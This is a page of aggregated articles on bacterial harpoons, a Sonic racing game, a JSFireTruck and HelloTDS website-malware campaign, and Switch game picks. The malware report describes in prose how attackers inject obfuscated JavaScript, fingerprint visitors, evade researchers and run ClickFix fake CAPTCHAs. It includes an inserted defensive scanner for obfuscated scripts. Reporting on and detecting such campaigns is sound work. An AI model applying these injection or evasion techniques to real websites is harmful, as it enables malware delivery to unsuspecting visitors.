• Hungry Bacteria Hunt Their Neighbors With Tiny, Poison-Tipped Harpoons

    Starving bacteria (cyan) use a microscopic harpoon—called the Type VI secretion system—to stab and kill neighboring cells (magenta). The prey burst, turning spherical and leaking nutrients, which the killers then use to survive and grow. (Image Credit: Glen D'Souza/ASU/Screen shot from video)

    Bacteria are bad neighbors. And we’re not talking noisy, never-take-out-the-trash bad neighbors. We’re talking has-a-harpoon-gun-and-points-it-at-you bad neighbors. According to a new study in Science, some bacteria hunt nearby bacterial species when they’re hungry. Using a special weapon system called the Type VI Secretion System (T6SS), these bacteria shoot, spill, and then absorb the nutrients from the microbes they harpoon.

    “The punchline is: When things get tough, you eat your neighbors,” said Glen D’Souza, a study author and an assistant professor at Arizona State University, according to a press release. “We’ve known bacteria kill each other, that’s textbook. But what we’re seeing is that it’s not just important that the bacteria have weapons to kill, but they are controlling when they use those weapons specifically for situations to eat others where they can’t grow themselves.”

    According to the study authors, the research doesn’t just have implications for bacterial neighborhoods; it also has implications for human health and medicine. By harnessing these bacterial weapons, it may be possible to build better targeted antibiotics, designed to overcome antibiotic resistance.

    Ruthless Bacteria Use Harpoons

    Researchers have long known that some bacteria can be ruthless, using weapons like the T6SS to clear out their competition. A nasty tool, the T6SS is essentially a tiny harpoon gun with a poison-tipped needle. When a bacterium shoots the weapon into another bacterium from a separate species, the needle pierces the microbe without killing it. Then, it injects toxins into the microbe that cause its internal nutrients to spill out.

    Up until now, researchers thought that this weapon helped bacteria eliminate their competition for space and for food. But after watching bacteria use the T6SS to attack their neighbors when food was scarce, the study authors concluded that these tiny harpooners use the weapon not only to remove rivals, but also to consume their competitors’ leaked nutrients.

    “Watching these cells in action really drives home how resourceful bacteria can be,” said Astrid Stubbusch, another study author and a researcher who worked on the study while at ETH Zurich, according to the press release. “By slowly releasing nutrients from their neighbors, they maximize their nutrient harvesting when every molecule counts.”

    Absorbing Food From Neighbors

    To show that the bacteria used this system to eat when there was no food around, the study authors compared their attacks in both nutrient-rich and nutrient-poor environments. When supplied with ample resources, the bacteria used their harpoons to kill their neighbors quickly, with the released nutrients leaking out and dissolving immediately. But when resources were few and far between, they used their harpoons to kill their neighbors slowly, with the nutrients seeping out and sticking around.

    “This difference in dissolution time could mean that the killer cells load their spears with different toxins,” D’Souza said in another press release. While one toxin could eliminate the competition for space and for food when nutrients are available, another could create a food source, allowing bacteria to “absorb as many nutrients as possible” when sustenance is in short supply.

    Because of all this, this weapon system is more than ruthless; it’s also smart, and important to some species’ survival. When genetically unedited T6SS bacteria were put in an environment without food, they survived on spilled nutrients. But when genetically edited T6SS bacteria were placed in a similar environment, they died, because their ability to find food in their neighbors had been “turned off.”

    Harnessing Bacterial Harpoons

    According to the study authors, the T6SS system is widely used by bacteria, both in and outside the lab. “It’s present in many different environments,” D’Souza said in one of the press releases. “It’s operational and happening in nature, from the oceans to the human gut.”

    The study authors add that their research could change the way we think about bacteria and could help in our fight against antibiotic resistance. In fact, the T6SS could one day serve as a foundation for targeted drug delivery systems, which could mitigate the development of broader bacterial resistance to antibiotics. But before that can happen, researchers have to learn more about bacterial harpoons, and about when and how bacteria use them, both to beat and eat their neighbors.

    Sam Walters is a journalist covering archaeology, paleontology, ecology, and evolution for Discover, along with an assortment of other topics. Before joining the Discover team as an assistant editor in 2022, Sam studied journalism at Northwestern University in Evanston, Illinois.
    WWW.DISCOVERMAGAZINE.COM
  • Can Sonic Racing: CrossWorlds Outrun Mario Kart World?

    Mario Kart World is one of the year's hottest games, but its pivot to an open world setting, while peeling back kart customization options, opened a massive rift for Sonic Racing: CrossWorlds to drift into. And Sega is determined to do everything possible to make its kart racer the one to beat by including numerous guest characters and cross-platform, multiplayer contests. I took Sonic Racing: CrossWorlds for a test drive at the Summer Game Fest, and it's a strong contender for racing game of the year.

    Sonic Racing: CrossWorlds' Deep Kart Customization

    The biggest difference between Sonic Racing: CrossWorlds and Mario Kart World is that Sega's title focuses on kart customization. I'm not just talking about colors and tires; CrossWorlds introduces Gadgets, add-ons that augment your car, giving your whip helpful abilities to bring into the race. (Credit: Sega)

    Each ride has a license plate with six slots where you can slot your chosen Gadgets. A Gadget can take up one, two, or three slots, so the idea is to find a mix that pairs well with character traits. There's a surprising amount of depth for people who want to min/max their favorite anthropomorphic animal.

    I chose Sonic, a speed character, and added a Gadget that started him with two boosts (one slot), a Gadget that improved his speed while trailing an opponent (two slots), and a Gadget that improved acceleration (three slots). There were so many Gadgets that I could have easily spent my entire demo session building a car to match my playstyle. I envision people happily getting lost in the weeds before participating in their first race. (Credit: Sega)

    Gameplay: This Ain't Mario Kart World

    Although it's not an open world like Mario Kart World, Sonic Racing: CrossWorlds injects a unique spin on traditional kart racing. The familiar trappings are all here, such as rings to boost your top speed. Each Grand Prix consists of three maps, but the gimmick at play is stage transitions. About a third of the way down a course, a giant ring-portal opens, presenting a new world and track (hence the name "CrossWorlds"). The shift in tone and terrain keeps the races fast-paced and unpredictable. I particularly liked how whoever is in first place can sometimes choose which CrossWorlds track to go down, controlling the tempo. With every race completion, you earn credits based on your performance that you can cash in for new car parts.

    In a stark contrast to Mario Kart World, Sonic Racing: CrossWorlds is far more aggressive, even on lower difficulties. At the start of each grand prix, the game assigns you a rival—this is the character to beat, and the one who taunts you all match. Beat them all, and you can race high-powered Super variants.

    Just about everything caused you to lose rings: bumping into other players, the walls, and, of course, getting hit by items. The series' trademark rubberband AI is still in place, too. Even in the press demo, I wasn't safe from taking four items back to back and being knocked off the stage mere feet away from the finish line. (Credit: Sega)

    The demo didn't include the new characters that debuted at the Summer Game Fest, but I studied the character screen to see who else could be coming to the game. Including the 12 Sonic characters available in the demo, I counted a whopping 64 character slots. They include Hatsune Miku (the ultra-popular Vocaloid), Joker (from Persona 5), Ichiban Kasuga (from Like a Dragon), and Steve (from Minecraft). However, I hope to see other classic Sega IPs like in previous Sonic Racing titles.

    Platforms and Release Date

    Will Sega do what Nintendon't? I had an exhilarating time playing Sonic Racing: CrossWorlds, and I can't wait to see more wild track compositions. Sonic Racing: CrossWorlds will be available on Nintendo Switch, PC, PlayStation 4, PlayStation 5, Xbox One, and Xbox Series X/S on Sept. 25, 2025. A Nintendo Switch 2 version is planned for later in the year.
    ME.PCMAG.COM
  • Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month

    Jun 13, 2025 | Ravie Lakshmanan | Web Security / Network Security

    Cybersecurity researchers are calling attention to a "large-scale campaign" that has been observed compromising legitimate websites with malicious JavaScript injections.
    According to Palo Alto Networks Unit 42, these malicious injects are obfuscated using JSFuck, which refers to an "esoteric and educational programming style" that uses only a limited set of characters to write and execute code.
    The cybersecurity company has given the technique the alternate name JSFireTruck, owing to the profanity in the original name.
    "Multiple websites have been identified with injected malicious JavaScript that uses JSFireTruck obfuscation, which is composed primarily of the symbols, +, {, and }," security researchers Hardik Shah, Brad Duncan, and Pranay Kumar Chhaparwal said. "The code's obfuscation hides its true purpose, hindering analysis."

    Further analysis has determined that the injected code is designed to check the website referrer, which identifies the address of the web page from which a request originated.
    Should the referrer be a search engine such as Google, Bing, DuckDuckGo, Yahoo!, or AOL, the JavaScript code redirects victims to malicious URLs that can deliver malware, exploits, traffic monetization, and malvertising.
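    The referrer check itself cannot be read out of a JSFireTruck blob without deobfuscating it, but the obfuscation is a cheap signal on its own: legitimate scripts almost never consist of nothing but brackets, parentheses, plus signs and exclamation marks. As an added example (not code from the article, Unit 42, or the campaign), the Node.js scanner below flags inline scripts whose characters are drawn almost entirely from the JSFuck/JSFireTruck alphabet; the alphabet, the thresholds and the sample page are assumptions constructed for this demo.

```javascript
// Added example (not code from The Hacker News, Unit 42, or the campaign itself):
// a triage scanner that flags inline <script> blocks whose characters are drawn
// almost entirely from the JSFuck/JSFireTruck alphabet. The alphabet is the classic
// JSFuck set plus the $ { } symbols mentioned in the article; the length and ratio
// thresholds are assumptions picked for this demo, not values from the report.

const OBFUSCATION_ALPHABET = new Set(['[', ']', '(', ')', '!', '+', '$', '{', '}']);

// Strip whitespace so indentation and line breaks do not dilute the ratio.
function compact(src) {
  return src.replace(/\s+/g, '');
}

// Fraction of non-whitespace characters that belong to the obfuscation alphabet.
function obfuscationRatio(src) {
  const body = compact(src);
  if (body.length === 0) return 0;
  let hits = 0;
  for (const ch of body) {
    if (OBFUSCATION_ALPHABET.has(ch)) hits += 1;
  }
  return hits / body.length;
}

// A short fragment such as "[]+{}" is ordinary JavaScript; only long, near-pure
// blobs are worth a human look, so both a minimum size and a ratio floor apply.
function isLikelyJsFireTruck(src, { minLength = 64, threshold = 0.9 } = {}) {
  return compact(src).length >= minLength && obfuscationRatio(src) >= threshold;
}

// Collect the bodies of inline <script> elements. A regex is adequate for a
// first-pass triage of saved pages; use a real HTML parser for anything more.
function extractInlineScripts(html) {
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const bodies = [];
  let match;
  while ((match = scriptRe.exec(html)) !== null) {
    bodies.push(match[1]);
  }
  return bodies;
}

// One finding per suspicious inline script: its position in the page, compacted
// size and alphabet ratio, so an analyst can jump straight to the injected block.
function scanHtml(html, opts) {
  const findings = [];
  extractInlineScripts(html).forEach((src, index) => {
    if (isLikelyJsFireTruck(src, opts)) {
      findings.push({
        index,
        length: compact(src).length,
        ratio: Number(obfuscationRatio(src).toFixed(3)),
      });
    }
  });
  return findings;
}

// Constructed samples, not captures from any infected site: an ordinary UI
// script, and a blob assembled from JSFuck-style fragments (every character is
// in the alphabet, so its ratio is exactly 1).
const BENIGN_SCRIPT =
  "window.addEventListener('load', function () {" +
  " document.getElementById('menu').classList.toggle('open');" +
  ' });';
const OBFUSCATED_BLOB = '(![]+[])[+[]]+'.repeat(6) + '(!![]+[])[+!+[]]';

const SAMPLE_PAGE = [
  '<html><head><title>Constructed test page</title></head><body>',
  '<script>' + BENIGN_SCRIPT + '</script>',
  '<p>Legitimate page content.</p>',
  '<script type="text/javascript">' + OBFUSCATED_BLOB + '</script>',
  '</body></html>',
].join('\n');

console.log(JSON.stringify(scanHtml(SAMPLE_PAGE), null, 2));
// prints one finding: { "index": 1, "length": 100, "ratio": 1 }
```

    Run against a saved copy of a page, the scanner points at which inline script to pull for deobfuscation; it says nothing about externally loaded scripts, which need to be fetched and scanned separately.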

    Unit 42 said its telemetry uncovered 269,552 web pages that have been infected with JavaScript code using the JSFireTruck technique between March 26 and April 25, 2025. A spike in the campaign was first recorded on April 12, when over 50,000 infected web pages were observed in a single day.
    "The campaign's scale and stealth pose a significant threat," the researchers said. "The widespread nature of these infections suggests a coordinated effort to compromise legitimate websites as attack vectors for further malicious activities."
    Say Hello to HelloTDS
    The development comes as Gen Digital took the wraps off a sophisticated Traffic Distribution Service (TDS) called HelloTDS that's designed to conditionally redirect site visitors to fake CAPTCHA pages, tech support scams, fake browser updates, unwanted browser extensions, and cryptocurrency scams through remotely-hosted JavaScript code injected into the sites.
    The primary objective of the TDS is to act as a gateway, determining the exact nature of content to be delivered to the victims after fingerprinting their devices. If the user is not deemed a suitable target, the victim is redirected to a benign web page.

    "The campaign entry points are infected or otherwise attacker-controlled streaming websites, file sharing services, as well as malvertising campaigns," researchers Vojtěch Krejsa and Milan Špinka said in a report published this month.
    "Victims are evaluated based on geolocation, IP address, and browser fingerprinting; for example, connections through VPNs or headless browsers are detected and rejected."
    Some of these attack chains have been found to serve bogus CAPTCHA pages that leverage the ClickFix strategy to trick users into running malicious code and infecting their machines with a malware known as PEAKLIGHT, which is known to serve information stealers like Lumma.

    Central to the HelloTDS infrastructure is the use of .top, .shop, and .com top-level domains that are used to host the JavaScript code and trigger the redirections following a multi-stage fingerprinting process engineered to collect network and browser information.
    "The HelloTDS infrastructure behind fake CAPTCHA campaigns demonstrates how attackers continue to refine their methods to bypass traditional protections, evade detection, and selectively target victims," the researchers said.
    "By leveraging sophisticated fingerprinting, dynamic domain infrastructure, and deception tactics (such as mimicking legitimate websites and serving benign content to researchers) these campaigns achieve both stealth and scale."

    Source: THEHACKERNEWS.COM, "Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month", Jun 13, 2025, Ravie Lakshmanan (Web Security / Network Security).
  • The Best Nintendo Switch Games for 2025

    The Best Games on Every Platform

    Animal Crossing: New Horizons

    Animal Crossing: New Horizons

    4.0 Excellent

    No game may end up defining 2020 more than Animal Crossing: New Horizons. Nintendo’s adorable life simulator has always had its fans. However, with the real world under lockdown, countless players have flocked to their own virtual islands to find community. Paying a mortgage to a raccoon is a small price to pay for the freedom to relax in your own social life again.

    Advance Wars 1+2: Re-Boot Camp

    Advance Wars 1 + 2: Re-Boot Camp

    4.0 Excellent

    Fire Emblem isn't Nintendo's only awesome strategy series. If you prefer soldiers and tanks over knights and horses, check out Advance Wars and its terrific turn-based tactics. This remake includes campaigns from the first two Game Boy Advance games, offering hours upon hours of brilliantly designed missions. You can also design your own maps and play against friends online.
    Advance Wars 1 + 2: Re-Boot Camp review

    ARMS

    ARMS

    4.0 Excellent

    ARMS is Nintendo's newest take on the fighting game genre. It combines cartoonish aesthetics, sci-fi weapons, and arm-stretching boxing into an accessible, offbeat fighter with a lot of variety. It's a polished, fun, competitive game that bears more than a passing visual similarity to Splatoon. Though time will tell if ARMS gains any momentum within the esports scene, the game offers plenty of opportunity to swing fists at your friends.

    Bayonetta 2

    Bayonetta 2

    4.5 Excellent

    Bayonetta 2 is another fantastic game that launched on the wrong system. Years after its initial release, Bayo 2 still stands as one of the best action games out there, and now that it's been ported from the Wii U to the Switch it can get the attention and devotion it deserves. Tight controls, robust challenge, and plenty of style make this stand out as a pinnacle of action games.

    Bayonetta 3

    Bayonetta 3

    4.5 Excellent

    Just when you thought Bayonetta couldn’t get any more bewitching, PlatinumGames delivers an absolute master class on video game action with Bayonetta 3. Besides Bayonetta’s familiar punches, kicks, and guns, you can further expand her combat options by summoning giant demons and directing their attacks. Meanwhile, the multiversal story is ridiculous, even by Bayonetta standards.

    Bloodstained: Ritual of the Night

    Bloodstained: Ritual of the Night

    4.0 Excellent

    If Bloodstained: Ritual of the Night's story of a demonic castle and a lone savior sounds incredibly familiar, it should: the game was spearheaded by Koji Igarashi, the big brain behind many revered Castlevania games. Bloodstained is an excellent Castlevania game in everything but name, hitting the same beats Symphony of the Night, Aria of Sorrow, and Order of Ecclesia did. If you're thirsty for a new, enjoyable Castlevania-like game that calls back to before Lords of Shadow rebooted the series and Mirror of Fate completely failed to capture any of its luster, this is the game for you.

    Bayonetta Origins: Cereza and the Lost Demon

    4.0 Excellent

    Bayonetta Origins: Cereza and the Lost Demon isn’t a hard-hitting, nonstop action game like the main Bayonetta trilogy. Instead, this is a relatively relaxed adventure game full of puzzles and gorgeous storybook visuals. Young witch Cereza teams up with a young demon, Cheshire, to tackle challenges neither could complete alone. Although the combat isn’t quite as complex as in the mainline Bayo games, there’s still plenty of flair to the faerie fights.
    Bayonetta Origins: Cereza and the Lost Demon review

    Bravely Default II

    Bravely Default II

    4.0 Excellent

    Modern Final Fantasy games have become their own beasts, but games like Bravely Default II remind us why we fell in love with those classic Square Enix JRPGs. In battle, you can either perform multiple actions at once or wait to save up for later turns, which opens up many strategic possibilities. On Switch, the diorama world looks more beautiful and nostalgic than ever.

    Cadence of Hyrule: Crypt of the NecroDancer

    Cadence of Hyrule: Crypt of the NecroDancer

    4.0 Excellent

    Crypt of the NecroDancer was a surprise indie hit in 2015, catching gamers' eyes and ears with its combination of roguelike randomized dungeon exploration with rhythm game beat-keeping. It hit the Nintendo Switch in 2018, and now it's back in a new and much more Nintendo-specific form: Cadence of Hyrule: Crypt of the NecroDancer, a title that injects rhythm game mechanics into The Legend of Zelda. This Switch game seamlessly combines Zelda and Crypt of the NecroDancer, creating a surprisingly accessible and thoroughly enjoyable experience played to the beat of Zelda's classic music.

    Cassette Beasts

    4.0 Excellent

    Pokémon doesn't have a monopoly on monster catching. Cassette Beasts is a stylish, indie RPG that puts its own spin on collecting creatures and pitting them against each other in combat. The open world has many quests, the fighting mechanics have the extra depth that experienced players crave, and the story veers off in cool, surreal directions. Most importantly, there are some great monster designs, like ghostly sheep and living bullets.
    Cassette Beasts review

    Clubhouse Games: 51 Worldwide Classics

    Clubhouse Games: 51 Worldwide Classics

    4.0 Excellent

    Forget fancy new video games. Sometimes you just want to play chess, solitaire, or one of the other virtual vintage games that make up this classic compilation. Not only is this a convenient way to play some of history’s most enduring games with friends, but Clubhouse Games: 51 Worldwide Classics does a great job educating you on that history, including the fascinating early Hanafuda history of Nintendo itself.

    Game Builder Garage

    Game Builder Garage

    4.5 Excellent

    If you thought Super Mario Maker was a great way to learn about game development, give Game Builder Garage a spin. This incredibly powerful 3D game creation tool lets you make anything from platformers to racing games to puzzle mysteries. Thorough, friendly tutorials explain the robust “Nodon” coding language, so even novices can create hitboxes and manipulate the Z-axis like pros.

    Donkey Kong Country: Tropical Freeze

    Donkey Kong Country: Tropical Freeze

    4.0 Excellent

    The Switch has gotten a reputation as a machine for game ports, and there's nothing wrong with that. The Wii U wasn't the massive hit the Wii was, but it still had several excellent games that went underappreciated in their time. Donkey Kong Country: Tropical Freeze is one of them, a sequel to Donkey Kong Country Returns with even more challenge and variety. The Switch version of this game adds Funky Kong Mode, an easier setting and new playable character that makes the surprisingly brutal platforming feel a little less punishing.

    Hades

    Hades

    Hades takes the punishing and divisive roguelike genre and masterfully twists it into one of the year's most addictive games. Fighting your way out of the Greek underworld with randomly changing skills and weapons feels incredible. The family drama at the game’s core gives you that extra narrative push to keep going. Plus, everyone is smoking hot.

    Indivisible

    Indivisible

    While many role-playing games draw their influences from Western folklore, even RPGs made in Japan, Indivisible carves out a unique identity with a fresh Southeast Asian flavor. The 2D animation is exquisite, as we would expect from the developer of Skullgirls. Gameplay is a mix of nonlinear spaces to explore and enemies to defeat in tactical battles. Of the two types of play, the exploration sections impress us more. In these bits you find your way forward by using an axe to fling yourself up walls or by shooting arrows to blind sentries. That's just more satisfying than the frantic messes the fights, caught awkwardly between turn-based and real-time combat, can turn into.

    Kirby's Return to Dream Land Deluxe

    Kirby’s Return to Dream Land Deluxe

    4.5 Excellent

    Kirby’s Return to Dreamland is a traditional, side-scrolling adventure compared to Kirby’s more radical outings. Still, it’s an excellent showcase of what makes even a normal Kirby game irresistible. This Deluxe version enhances the Wii co-op classic with a sweet, new art style; extra powers; and an original epilogue.
    Kirby’s Return to Dream Land Deluxe review

    Kirby and the Forgotten Land

    Kirby and the Forgotten Land

    4.0 Excellent

    Kirby and the Forgotten Land finally gives the pink puffball the epic 3D adventure that Mario, Link, and Samus got years ago. Float through the skies in creative levels bursting with secrets. Upgrade familiar powers, such as hammers and swords, into formidable new forms. Or just sit back and marvel at how Nintendo made the post-apocalypse look so cute.

    Kirby Star Allies

    Kirby Star Allies

    4.0 Excellent

    Kirby games are always fun. Whether they're the simple platformers like Kirby's Adventure or weirdly gimmicky experiences like Kirby's Dream Course, every first-party experience with Nintendo's pink puff ball has been enjoyable. Kirby Star Allies is no different, with a lighthearted campaign filled with colorful friends and abilities, surprisingly challenging extra modes to unlock, and support for up to four players at once. Get on the Friend Train!

    The Legend of Zelda: Breath of the Wild

    The Legend of Zelda: Breath of the Wild

    4.5 Excellent

    Hyrule is in danger again, and Link must save it. That's been the theme for nearly every Legend of Zelda game, and it's still the case in The Legend of Zelda: Breath of the Wild. The series' basic premise and Link/Zelda/Ganon dynamic are present, but nearly everything else is different. The classic Zelda dungeon-exploration structure is replaced by a huge open world that's filled with destructible weapons, monsters, puzzles, and quests. Breath of the Wild's scope is one previously unseen in the Zelda series, and Nintendo executes the adventure-filled world with aplomb.

    The Legend of Zelda: Echoes of Wisdom

    The Legend of Zelda: Echoes of Wisdom - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite

    4.5 Excellent

    The Legend of Zelda: Echoes of Wisdom turns Nintendo's epic franchise on its head in more ways than one. Instead of the swordsman, Link, you play as Princess Zelda. Likewise, you don't directly attack enemies; you summon useful items and foes to aid you on the mission. The game takes the creative, improv spirit of Breath of the Wild and applies it to a classic 2D top-down Zelda adventure with delightful results. Plus, it just looks adorable.
    The Legend of Zelda: Echoes of Wisdom - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite review

    The Legend of Zelda: Skyward Sword HD

    The Legend of Zelda: Skyward Sword HD

    3.5 Good

    No Zelda games are terrible, but no game polarizes the fan base quite like Skyward Sword. Fortunately, this HD remaster speeds up the pacing, enhances the graphics, and offers a button-based control scheme if you don’t care for motion controls. The structure feels especially linear in a post-Breath of the Wild world, but Zelda’s origin story is still worth experiencing.

    The Legend of Zelda: Tears of the Kingdom

    The Legend of Zelda: Tears of the Kingdom - Nintendo Switch, Nintendo Switch, Nintendo Switch Lite

    5.0 Outstanding

    At launch, it was tough to imagine the Switch ever getting another game as good as Breath of the Wild. But years later, The Legend of Zelda: Tears of the Kingdom delivers everything we could have possibly wanted and more in this direct sequel to one of the greatest games ever made. Exploring the skies and underground caves makes Hyrule more vast than ever. New powers let you break the world apart and rebuild it as you see fit. Tears of the Kingdom is an irresistible, hypnotic adventure, and an absolute must-play for all RPG fans.
    The Legend of Zelda: Tears of the Kingdom - Nintendo Switch, Nintendo Switch, Nintendo Switch Lite review

    Lego Star Wars: The Skywalker Saga

    Lego Star Wars: The Skywalker Saga

    4.0 Excellent

    Who knows what the future holds for Star Wars, but Lego Star Wars: The Skywalker Saga provides a terrific toybox take on Episodes I-IX. The Lego recreations of all nine movies give you plenty to experience as you blast baddies and solve Force puzzles. But what really makes this game so special is how it turns the entire Star Wars galaxy into an open world to explore, whether it’s on colorful planets or through the vastness of outer space in your trusty starfighter.
    Lego Star Wars: The Skywalker Saga review

    Luigi's Mansion 3

    Luigi's Mansion 3 - Nintendo Switch Standard Edition

    What started as a weirdly specific parody of Ghostbusters and Resident Evil has become one of the finest Mario spin-off adventures. Luigi’s spooky journey throughout a haunted hotel is arguably the most visually stunning game on the Nintendo Switch. Along with sucking up ghosts, you can now slam them to death and shoot plungers to pull apart the scenery. Your greatest, and grossest, tool has to be Gooigi. This slimy green doppelgänger expands your puzzle-solving powers and provides an easy option for younger co-op partners.

    Lumines Remastered

    Lumines Remastered

    4.5 Excellent

    Puyo Puyo Tetris is great for classic, competitive block-dropping, but it's a bit overly perky and anime-ish to really relax to. Lumines Remastered is the ultimate chill-out block-dropper, syncing the mesmerizing pattern matching to dozens of hypnotic electronic and trance tracks. Load it on your Switch, put on your favorite headphones, and space out while you build huge combos.

    Mario & Luigi: Brothership

    Mario & Luigi: Brothership - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite

    4.0 Excellent

    Mario & Luigi: Brothership revives a Mario RPG subseries as a grand nautical adventure. The plumbers sail the seas, reconnecting scattered islands and battling foes with familiar, frenetic turn-based combat. On Nintendo Switch, the visuals and animations turn Mario and Luigi into cartoon-like characters.
    Mario & Luigi: Brothership - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite review

    Mario + Rabbids: Kingdom Battle

    Mario + Rabbids: Kingdom Battle

    4.0 Excellent

    Before Minions, there were Rabbids, Ubisoft's manic, sublingual, noseless horde spawned from Rayman: Raving Rabbids. Then the weird, bug-eyed, rabbit-like creatures caused havoc in their own game series. Now, they're running around Mario's stomping grounds in Mario + Rabbids: Kingdom Battle. This strategy-RPG combines two cartoonish worlds with satisfyingly deep, XCOM-like gameplay for a very fun and strange experience. It's a combination of styles that works much, much better than you'd expect.

    Mario + Rabbids Sparks of Hope

    Mario + Rabbids Sparks of Hope

    4.0 Excellent

    Mario + Rabbids Kingdom Battle proved that these two mascots could come together for excellent, approachable tactics gameplay. Sparks of Hope is more of the same, but even better. Equipping Sparks lets you further customize your squad’s strategic abilities. Wide open levels provide entertaining exploration between the skirmishes.

    Mario Golf: Super Rush

    Mario Golf: Super Rush

    4.0 Excellent

    Leave it to Mario to find a way to make golf games feel fresh again. Mario Golf: Super Rush’s standout gimmick has golfers teeing off all at once, and then physically running across the course to take their next shot. You still have to plan smart strokes, but you also need to keep an eye on the clock. The lengthy, single-player adventure teaches you the ropes before you head online to face real challengers on the green.

    Mario Kart 8 Deluxe

    Mario Kart 8 Deluxe

    4.5 Excellent

    Mario Kart 8 stood out as the best-looking Mario Kart game yet when it came out on the Nintendo Wii U. Instead of making a new Mario Kart for the Nintendo Switch, Nintendo brought Mario Kart 8 to its new game system. In the process, Nintendo threw in both previously released DLC packs and made a few welcome changes to its multiplayer options, justifying the game's full retail price. Mario Kart 8 Deluxe is the most robust game in the series so far, and with the optional portability of the Switch, it ranks as a must-own title.

    Mario Strikers: Battle League

    Mario Strikers: Battle League

    4.0 Excellent

    Mario has played many sports throughout the years, but Mario Strikers: Battle League gives us the arcade soccer chaos fans have craved for more than a decade. It features fast-paced action, while allowing for depth and skill should you choose to push yourself. Customize your characters with stat-changing gear. Join online clubs to compete in ongoing seasons. And no one animates the Mario universe with as much style and attitude as the developers at Next Level Games.
    Mario Strikers: Battle League review

    Mario Tennis Aces

    Mario Tennis Aces

    4.0 Excellent

    You don't need to be a sports fan to enjoy Nintendo sports games. If a sport has "Mario" in front of it, it's probably going to be a fun, very unrealistic romp instead of a serious simulation. Mario Tennis Aces is an exciting tennis game not because of any realistic physics, but because of fast, responsive gameplay and strategic mechanics that make matches feel more like rounds in a fighting game than tennis sets.

    Marvel vs. Capcom Fighting Collection: Arcade Classics

    Marvel vs. Capcom Fighting Collection: Arcade Classics - Nintendo Switch

    4.0 Excellent

    Marvel vs. Capcom Fighting Collection: Arcade Classics lets you finally relive six legendary 2D fighters starring Marvel superheroes and Capcom icons. From the humble X-Men: Children of the Atom to the over-the-top Marvel vs. Capcom 2, this is vital fighting game history. An art gallery, modern control options, rollback netcode, and the underrated Punisher beat 'em up sweeten the deal.
    Marvel vs. Capcom Fighting Collection: Arcade Classics - Nintendo Switch review

    Metal Slug Tactics

    Metal Slug Tactics

    Metal Slug Tactics trades the mainline series' fast-paced running and gunning for methodical, turn-based strategy gameplay. Still, it's just as action-packed as ever. Line up your units for devastating sync attacks. Enjoy the beautiful old-school sprite work. Plan your turns, hop into a giant tank, and obliterate foes.

    Metroid Dread

    Metroid Dread

    4.5 Excellent

    After nearly 20 years, Metroid Dread brings Samus Aran back to her 2D, bounty hunting roots for the true Metroid 5. In it, you explore a dense, dangerous new planet full of powers to pick up and enemies to eliminate. From uncompromising boss battles to terrifying chases, Dread more than lives up to its subtitle. If there's anyone strong enough to take down the terror, it's Nintendo's leading lady.

    Metroid Prime Remastered

    5.0 Outstanding

    Metroid Prime is one of the best games ever made. It takes Super Metroid’s brilliant exploratory action and perfectly translates it to 3D with immaculate level design and immersive first-person shooting. This remaster, which ventures into the remake territory, includes everything that worked in the original, and ups the presentation to modern, beautiful standards. Plus, you can now play with dual-stick controls. Bring on Metroid Prime 4.
    Metroid Prime Remastered review

    Miitopia

    Miitopia

    3.5 Good

    Miis can do more than just play Wii Sports. In Miitopia, you use Nintendo’s cartoon caricatures to cast yourself, friends, and family as heroes and villains in a fast-paced, whimsical role-playing game. Turn yourself into a brave knight, while your buddy supports you as a pop star. The joke can’t quite sustain the whole runtime, but Miitopia is wildly entertaining.  

    Monster Hunter Stories 2: Wings of Ruin

    Monster Hunter Stories 2: Wings of Ruin

    4.0 Excellent

    If traditional Monster Hunter is just too intense for you, Monster Hunter Stories 2 lets you experience this cutthroat world as a turn-based JRPG. Befriend monsters and take them into battle. Hatch eggs to expand your menagerie. Strategic battles draw upon familiar Monster Hunter concepts. And, of course, Rathalos is here.

    New Pokemon Snap

    New Pokemon Snap

    4.0 Excellent

    The beloved Nintendo 64 spin-off finally gets the update it deserves. Instead of capturing Pokemon and forcing them to battle, New Pokemon Snap asks you to take beautiful photos of Pikachu and friends in their natural surroundings. The on-rails gameplay feels like a nonviolent version of a light gun game. The gorgeous graphics will inspire you to share your best pics online for the world to see.

    Nickelodeon All-Star Brawl

    Nickelodeon All-Star Brawl

    4.0 Excellent

    Imagine Super Smash Bros., but instead of playing as video game mascots, you control beloved cartoon characters beating each other senseless. That's Nickelodeon All-Star Brawl. From SpongeBob SquarePants to Ren and Stimpy to the Teenage Mutant Ninja Turtles, the roster covers all eras of Nicktoon nostalgia. Beyond the ironic meme potential, "Nick Smash" features genuinely fantastic gameplay made by a team clearly passionate about this particular form of "platform fighting" games.
    Nickelodeon All-Star Brawl review

    Nintendo Labo Toy-Con 01 Variety Kit

    Nintendo Labo Toy-Con 01 Variety Kit

    5.0 Outstanding

    Labo is a weirder concept than the Switch itself. It's based around building cardboard "Toy-Cons" in which you place the Switch's components to let you do new things with them. It's also surprisingly functional, entertaining, and educational. The Nintendo Labo Variety Kit has all of the parts you need to build several different Toy-Cons like a piano and motorcycle handlebars, and walks you through every step of the process. Just building the Toy-Cons is fascinating, but the Toy-Con Garage mode adds surprisingly robust programming options to let you create your own remote-controlled creations.

    Nintendo Labo: VR Kit

    4.5 Excellent

    It took over 20 years, but Nintendo finally got over its fear of virtual reality after the disastrous Virtual Boy. The Labo VR Kit lets you build your own VR headset that uses the Nintendo Switch and a set of lenses to create a stereoscopic image, and then insert that headset into different Toy-Con controllers to play a variety of games. That's already a ton of fun. Add a programming environment on top that lets you create your own 3D games, and you have an impressive package.

    No More Heroes III

    No More Heroes III

    4.0 Excellent

    No More Heroes III, like the other games in Suda51’s hack-and-slash trilogy, is a punk art game. Sure, some parts may be “bad,” like the technical jank or empty open worlds. But it’s all in service of larger commentary on everything from schlocky movies to wrestling fandom to the video game industry itself. Plus, cutting aliens down to size feels legitimately fantastic, and really that’s what matters. 

    Penny's Big Breakaway

    4.0 Excellent

